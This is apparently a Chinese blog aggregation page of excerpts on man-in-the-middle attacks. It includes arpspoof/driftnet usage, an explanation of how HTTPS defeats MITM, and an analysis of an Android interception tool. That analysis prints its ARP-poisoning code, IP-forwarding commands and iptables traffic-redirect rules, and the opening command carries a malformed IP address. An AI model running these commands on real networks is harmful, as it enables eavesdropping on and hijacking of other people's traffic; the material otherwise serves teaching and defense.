-
2019-04-15 00:00:03
arpspoof -i etch0(攻击者网卡) -t 192.168.2.1(网关) 192.168.1.2.157(被攻击者IP)
监控 driftnet -i etch0
查看本地arp缓存 arp -a
清除arp缓存 arp -d
语法: driftnet [options] [filter code]
主要参数:
-b 捕获到新的图片时发出嘟嘟声
-i interface 选择监听接口
-f file 读取一个指定pcap数据包中的图片
-p 不让所监听的接口使用混杂模式
-a 后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)
-m number 指定保存图片数的数目
-d directory 指定保存图片的路径
-x prefix 指定保存图片的前缀名
使用举例:
1.实时监听: driftnet -i wlan0
2.读取一个指定pcap数据包中的图片: driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/
---------------------
作者:iteye_3978
来源:CSDN
原文:https://blog.csdn.net/iteye_3978/article/details/82677558
版权声明:本文为博主原创文章,转载请附上博文链接!更多相关内容 -
基于ARP欺骗的中间人攻击的Python实现.docx
2020-04-17 11:49:12使用Python的scapy模块构造ARP数据包发送给目标机进行ARP欺骗,成功实施了中间人攻击,然后嗅探局域网内部网络流量,截取HTTP协议数据包进行解析,初步实现了在被攻击者浏览网页点击图片时,实时抓取这些点击的图片... -
激进模式下对IKEv1的中间人攻击分析 (2010年)
2021-05-10 04:51:32实施中间人攻击的步骤是首先利用IKEv1的离线口令穷举获取预共享密钥,获得预共享密钥后,把Diffie-Hellman(DH)中间人攻击原理应用于IKEv1的激进模式,实现对IKEv1的中间人攻击。通过分析该模式的中间人攻击原理,得出了... -
HTTPS及HTTPS中间人攻击
2021-02-01 12:08:46HTTPS及HTTPS中间人攻击,全站HTTPS正在称为潮流趋势,国内实现全站https的有淘宝和百度两家。 CIA:机密性,完整性,可用性(可用性是合法用户可以访问自己有权限访问的资源) 解决的是信息传输中数据被篡改、窃取 ... -
基于ssl中间人攻击例子
2020-09-23 17:07:02实现一个ssl的客户端和服务端,作为中间人攻击,截取ssl通讯中的密文数据,并进行解密,使用时用把所有的报文都转向给程序所在的机器。 -
中间人攻击之Cookie
2019-03-24 19:54:28某培训机构网课,平平淡淡,入门级别的东西 -
安卓wifi破解、中间人攻击等
2018-09-06 11:39:02安卓wifi破解、中间人攻击、安卓wifi嗅探,断开连接等 -
图解中间人攻击
2021-03-13 16:06:35何为HTTP 中间人攻击 HTTP 协议使用起来确实非常的方便,但是它存在一个致命的缺点:不...下面来举个例子: 小明在 JAVA 贴吧发帖,内容为我爱JAVA: ...如何防止中间人攻击 这个时候可能就有人想到了,既然内容是明何为HTTP 中间人攻击
HTTP 协议使用起来确实非常的方便,但是它存在一个致命的缺点:不安全。我们知道 HTTP 协议中的报文都是以明文的方式进行传输,不做任何加密,这样会导致什么问题呢?下面来举个例子:
小明在 JAVA 贴吧发帖,内容为我爱JAVA:
被中间人进行攻击,内容修改为我爱PHP
可以看到在 HTTP 传输过程中,中间人能看到并且修改 HTTP 通讯中所有的请求和响应内容,所以使用 HTTP 是非常的不安全的。
如何防止中间人攻击
这个时候可能就有人想到了,既然内容是明文那我使用对称加密的方式将报文加密这样中间人不就看不到明文了吗,于是如下改造:
双方约定加密方式
使用 AES 加密报文
这样看似中间人获取不到明文信息了,但其实在通讯过程中还是会以明文的方式暴露加密方式和秘钥,如果第一次通信被拦截到了,那么秘钥就会泄露给中间人,中间人仍然可以解密后续的通信:
那么对于这种情况,我们肯定就会考虑能不能将秘钥进行加密不让中间人看到呢?答案是有的,采用非对称加密,我们可以通过 RSA 算法来实现。这个步骤实际操作也是比较简单的。在约定加密方式的时候由服务器生成一对公私钥,服务器将公钥返回给客户端,客户端本地生成一串秘钥(AES_KEY)用于对称加密,并通过服务器发送的公钥进行加密得到(AES_KEY_SECRET),之后返回给服务端,服务端通过私钥将客户端发送的AES_KEY_SECRET进行解密得到AEK_KEY,最后客户端和服务器通过AEK_KEY进行报文的加密通讯,改造如下:
可以看到这种情况下中间人是窃取不到用于AES加密的秘钥,所以对于后续的通讯是肯定无法进行解密了,那么这样做就是绝对安全了吗?所谓道高一尺魔高一丈,中间人为了对应这种加密方法又想出了一个新的破解方案,既然拿不到AES_KEY,那我就把自己模拟成一个客户端和服务器端的结合体,在用户->中间人的过程中中间人模拟服务器的行为,这样可以拿到用户请求的明文,在中间人->服务器的过程中中间人模拟客户端行为,这样可以拿到服务器响应的明文,以此来进行中间人攻击:
这一次通信再次被中间人截获,中间人自己也伪造了一对公私钥,并将公钥发送给用户以此来窃取客户端生成的AES_KEY,在拿到AES_KEY之后就能轻松的进行解密了。中间人这样为所欲为,就没有办法制裁下吗,当然有啊,接下来我们看看 HTTPS 是怎么解决通讯安全问题的。
HTTPS 如何避免中间人攻击
HTTPS 其实是SSL+HTTP的简称,当然现在SSL基本已经被TLS取代了,不过接下来我们还是统一以SSL作为简称,SSL协议其实不止是应用在HTTP协议上,还在应用在各种应用层协议上,例如:FTP、WebSocket。其实SSL协议大致就和上一节非对称加密的性质一样,握手的过程中主要也是为了交换秘钥,然后再通讯过程中使用对称加密进行通讯,大概流程如下:
这里我只是画了个示意图,其实真正的 SSL 握手会比这个复杂的多,但是性质还是差不多,而且我们这里需要关注的重点在于 HTTPS 是如何防止中间人攻击的。通过上图可以观察到,服务器是通过 SSL 证书来传递公钥,客户端会对 SSL 证书进行验证,其中证书认证体系就是确保SSL安全的关键。
-
Android 中间人攻击
2021-06-10 09:42:420x00Android中间人攻击的思路就是劫持局域网中被攻击机器和server间的对话。被攻击机器和server表面上工作正常,实际上已经被中间人劫持。能够从一张图来明确这个过程。受攻击主机发送的数据,首先经过了攻击者。从...0x00
Android中间人攻击的思路就是劫持局域网中被攻击机器和server间的对话。被攻击机器和server表面上工作正常,实际上已经被中间人劫持。能够从一张图来明确这个过程。
受攻击主机发送的数据,首先经过了攻击者。从server返回的数据也经过攻击者,再发送给受攻击主机。
0x01
Android开源中间人攻击样例。请參考https://github.com/ssun125/Lanmitm。我们这里主要分析这个链接中效果预览中会话劫持的原理。
1、使用Iptables进行NAT数据包转发
public static final String[] PORT_REDIRECT_CMD = {
"iptables -t nat -F",
"iptables -F",
"iptables -t nat -I POSTROUTING -s 0/0 -j MASQUERADE",
"iptables -P FORWARD ACCEPT",
"iptables -t nat -A PREROUTING -j DNAT -p tcp --dport 80 --to "
+ AppContext.getIp() + ":" + HttpProxy.HTTP_PROXY_PORT }; 这个命令是在ProxyService类的startHttpProxy方法中调用的。
2、开启端口转发,同意本机像路由器那样转发数据包
private String[] FORWARD_COMMANDS = { "echo 1 > /proc/sys/net/ipv4/ip_forward",
"echo 1 > /proc/sys/net/ipv6/conf/all/forwarding" }; 这个是在ArpService类的onStartCommand方法中调用的。
3、ARP投毒
if ((ONE_WAY_HOST & arp_cheat_way) != 0) {
if (target_ip == null)
target_ip = AppContext.getTarget().getIp();
if (!target_ip.equals(AppContext.getGateway()))
arp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
+ " -t " + target_ip + " "
+ AppContext.getGateway();
else
arp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
+ " -t " + AppContext.getGateway() + " "
+ target_ip;
arpSpoof = new Thread() {
@Override
public void run() {
ShellUtils.execCommand(arp_spoof_cmd, true, false);
}
};
arpSpoof.start();
}
if ((ONE_WAY_ROUTE & arp_cheat_way) != 0) {
arp_spoof_recv_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
+ " -t " + AppContext.getGateway() + " "
+ AppContext.getIp();
arpSpoofRecv = new Thread() {
@Override
public void run() {
ShellUtils.execCommand(arp_spoof_recv_cmd, true, false);
}
};
arpSpoofRecv.start();
} 这个是在ArpService类的onStartCommand方法中调用的。
4、在攻击者机器依据Socket原理,创建一个WebServer,原理相似于使用NanoHttpd实现简易WebServer。
这样被攻击者发送给攻击者的请求就能被获取。而且显示在界面上。
核心的代码例如以下:
public class HttpProxy extends Thread {
......
@Override
public void run() {
try {
mServerSocket = new ServerSocket();
mServerSocket.setReuseAddress(true);
mServerSocket.bind(
new InetSocketAddress(AppContext.getInetAddress(),
HTTP_PROXY_PORT), BACKLOG);
executor = Executors.newCachedThreadPool();
while (!stop) {
Socket client = mServerSocket.accept();
DealThread dealThread = null;
switch (mProxyMode) {
case MODE_PROXY_SIMPLE:
dealThread = new SimpleDealThread(client,
mOnRequestListener);
break;
case MODE_PROXY_DEEP:
dealThread = new DeepDealThread(client, mOnRequestListener);
break;
}
executor.execute(dealThread);
}
} catch (IOException e) {
e.printStackTrace();
} finally {
if (mServerSocket != null) {
try {
mServerSocket.close();
} catch (IOException e) {
e.printStackTrace();
}
}
if (executor != null) {
executor.shutdownNow();
}
}
}
......
}
-
中间人攻击-MITM
2021-11-04 10:18:58中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为...1.概念
中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。
中间人攻击(Man-in-the-Middle Attack, MITM)是一种由来已久的网络入侵手段,并且当今仍然有着广泛的发展空间,如SMB会话劫持、DNS欺骗等攻击都是典型的MITM攻击。简而言之,所谓的MITM攻击就是通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情。
随着计算机通信网技术的不断发展,MITM攻击也越来越多样化。最初,攻击者只要将网卡设为混杂模式,伪装成代理服务器监听特定的流量就可以实现攻击,这是因为很多通信协议都是以明文来进行传输的,如HTTP、FTP、Telnet等。后来,随着交换机代替集线器,简单的嗅探攻击已经不能成功,必须先进行ARP欺骗才行。如今,越来越多的服务商(网上银行,邮箱登陆)开始采用加密通信,SSL(Secure Sockets Layer 安全套接层)是一种广泛使用的技术,HTTPS、FTPS等都是建立在其基础上的。
2.防御攻击
eavesdrop 英[ˈiːvzdrɒp] 美[ˈiːvzdrɑːp] vi. 窃听; 偷听(其他人谈话); n. 檐水; [例句]Power sockets can be used to eavesdrop on what people type on a computer. 强大的程序接口可以窃听人们在电脑上的输入字符。 [其他] 第三人称单数:eavesdrops 复数:eavesdrops 现在分词:eavesdropping 过去式:eavesdropped 过去分词:eavesdropped
-
中间人攻击的技术构成.pptx
2022-04-07 17:33:21信息安全-中间人攻击的技术构成,以及Kali Linux的双工具. -
Ettercap:中间人攻击使用
2022-05-02 21:42:121、在kali中输入:ettercap -G 打开 最新版本的Ettercap,并选择...4、添加攻击的目标 网段下的所有主机作为Target1,网关作为Target2 5、进行右上角的标志,点击ARP poisoning 攻击 6、查看kail的物理地址,... -
中间人攻击
2022-02-09 13:22:12中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”) 是指攻击者与通讯的两端分别创建独立的联系,并交换其所收到的数据,使通讯的两端认为他们正在通过一个私密的连接与对方 直接对话,但事实上整个会话都被... -
论文研究-防范中间人攻击的可信网络连接协议改进.pdf
2019-07-22 21:58:15可信网络连接协议作为可信计算框架中的核心技术,存在中间人攻击的安全威胁。为了解决中间人攻击问题,优化了Diffie-Hellman密钥交换协议,提出了基于数字签名及签名验证的端到端协议。与现有协议相比,提出的方案... -
HTTPS连接过程中的中间人攻击
2022-02-08 21:05:01这里写目录标题HTTPS连接过程中间人劫持攻击 HTTPS连接过程 https协议就是http+ssl协议,如下图所示为其连接过程: HTTPS连接的整个工程如下: https请求:客户端向服务端发送https请求; 生成公钥和私钥:服务端... -
MySQL曝中间人攻击Riddle漏洞可致用户名密码泄露的处理方法
2020-09-09 11:37:17Riddle漏洞存在于DBMS Oracle MySQL中,攻击者可以利用漏洞和中间人身份窃取用户名和密码。下面小编给大家带来了MySQL曝中间人攻击Riddle漏洞可致用户名密码泄露的处理方法,需要的朋友参考下吧 -
公共wifi下的中间人攻击
2020-12-22 14:56:51现在许多地方都提供免费公共WiFi。作为使用服务的额外好处,机场,酒店和咖啡馆都在提供免费的网络连接。对于许多人来说,能够在旅途中连接到免费的...中间人攻击当有恶意行为者设法拦截双方之间的通信时,就会发生... -
3G背景下异构互连网络的中间人攻击
2021-01-20 00:51:08文章介绍了2G/3G以及3G-WLAN两种异构互连网络的中间人攻击,分析了攻击的可行性,并各自讨论了相应的防御机制,最后对异构无线网络的安全做出了总结和展望。 -
Lanmitm:Android中间人攻击测试工具
2021-04-12 20:33:24Lanmitm — Android中间人攻击测试工具 #####下载说明:安装文件请直接进入download目录下载,开发版请自行导入eclipse中运行 更新历史 ####v1.2.1版本说明 (2014-12-15) 1、修复bug ####v1.2版本说明 (2014-12-12) ... -
简述HTTPS中间人攻击
2022-03-22 16:45:22中间人攻击过程如下: 服务器向客户端发送公钥。 攻击者截获公钥,保留在自己手上。 然后攻击者自己生成一个【伪造的】公钥,发给客户端。 客户端收到伪造的公钥后,生成加密hash值发给服务器。 ... -
中间人劫持攻击
2020-11-02 22:40:19常见的HTTPS中间人攻击,首先需要结合ARP、DNS欺骗等技术,来对会话进行拦截, 1、SSL证书欺骗攻击 此类攻击较为简单常见。首先通过ARP欺骗、DNS劫持甚至网关劫持等等,将客户端的访问重定向到攻击者的机器,让... -
mininet_sshmitm:这是使用Mininet和Ettercap的SSH中间人(MITM)攻击的示例
2021-05-07 13:37:25在此演示中,我们将演示恶意攻击者如何通过称为ARP欺骗的方法窃听SSH客户端和SSH服务器之间的流量,从而成为中间人主机。 入门 此示例需要两个至关重要的软件,分别称为Mininet和Ettercap。 我们将在下面介绍如何... -
SSH基础:中间人攻击防范
2019-12-08 11:22:53中间人攻击有很多方式,比如常见的ARP或者DNS欺骗,在SSH连接时也有可能碰到类似的情况,所以ssh在know_hosts的管理中加入了对于已知服务器的信任列表的管理,多多少少可以确认一些可能的风险。 -
中间人攻击替换图片
2019-04-15 00:05:01一:先准备一张图片 恩恩!低调点好! 我们将图片放大kali的var/www/html目录下 ...三:编写攻击脚本 if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) {... -
什么是中间人攻击?
2021-09-07 15:49:04中间人攻击(通常缩写为MitM或MiM)是一种会话劫持网络攻击。黑客拦截数字共享的信息,通常是作为窃听者或冒充他人。这种类型的攻击非常危险,因为它可能会导致一些风险,如信息被盗或虚假通信,通常很难检测到这些... -
kali中间人攻击
2022-01-14 23:36:221. 了解如何为kali配置IP地址。 2. 了解如何应用kali中的ettercap工具能进行ARP投毒。 3. 理解ARP原理、ARP攻击原理、ARP欺骗原理。 -
DH密钥协商(抗中间人攻击).rar
2021-08-05 18:41:40合肥工业大学密码学实验,改进的DH密钥协商(抗中间人攻击),含源码和报告,使用语言为Python,得分92.